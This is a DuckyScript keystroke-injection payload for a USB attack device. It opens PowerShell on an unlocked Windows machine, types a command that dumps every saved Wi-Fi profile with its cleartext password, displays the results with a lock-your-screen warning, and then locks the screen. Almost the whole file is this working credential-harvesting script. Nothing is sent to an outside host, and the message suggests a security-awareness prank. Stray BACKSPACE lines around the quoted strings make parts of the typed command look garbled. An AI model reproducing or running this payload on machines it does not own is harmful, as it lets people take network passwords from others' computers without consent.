REM                                                                    _..._       .-'''-.                 .-'''-.
REM                                                                 .-'_..._''.   '   _    \  .---.       '   _    \
REM /|                                                            .' .'      '.\/   /` '.   \ |   |.--. /   /` '.   \
REM ||    .-.          .-                                        / .'          .   |     \  ' |   ||__|.   |     \  '
REM ||     \ \        / /                               .-,.--. . '            |   '      |  '|   |.--.|   '      |  '
REM ||  __  \ \      / /                          __    |  .-. || |            \    \     / / |   ||  |\    \     / /
REM ||/'__ '.\ \    / /            .--------.  .:--.'.  | |  | || |             `.   ` ..' /  |   ||  | `.   ` ..' /
REM |:/`  '. '\ \  / /             |____    | / |   \ | | |  | |. '                '-...-'`   |   ||  |    '-...-'`
REM ||     | | \ `  /                  /   /  `" __ | | | |  '-  \ '.          .              |   ||  |
REM ||\    / '  \  /                 .'   /    .'.''| | | |       '. `._____.-'/              |   ||__|
REM |/\'..' /   / /                 /    /___ / /   | |_| |         `-.______ /               '---'
REM '  `'-'`|`-' /                 |         |\ \._,\ '/|_|                  `
REM          '..'                  |_________| `--'  `"

DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING $profiles = netsh wlan show profiles | Select-String ""
BACKSPACE
STRING All User Profile\s+:\s+(.+)$""
BACKSPACE
STRING  | ForEach-Object { $_.Matches.Groups[1].Value }; foreach ($profile in $profiles) { Write-Host ""
BACKSPACE
STRING Wifi:     $profile""
BACKSPACE
STRING ; netsh wlan show profile name=$profile key=clear | Select-String ""
BACKSPACE
STRING Key Content\s+:\s+(.+)$""
BACKSPACE
STRING  | ForEach-Object { Write-Host ""
BACKSPACE
STRING Password: $($_.Matches.Groups[1].Value)`r`n""
BACKSPACE
STRING  } }; Write-Host ''
BACKSPACE
STRING SOMEBODY COULD HAVE STOLEN YOUR WI-FI PASSWORDS. PLEASE LOCK YOUR SCREEN NEXT TIME!!!''
BACKSPACE
ENTER
GUI l
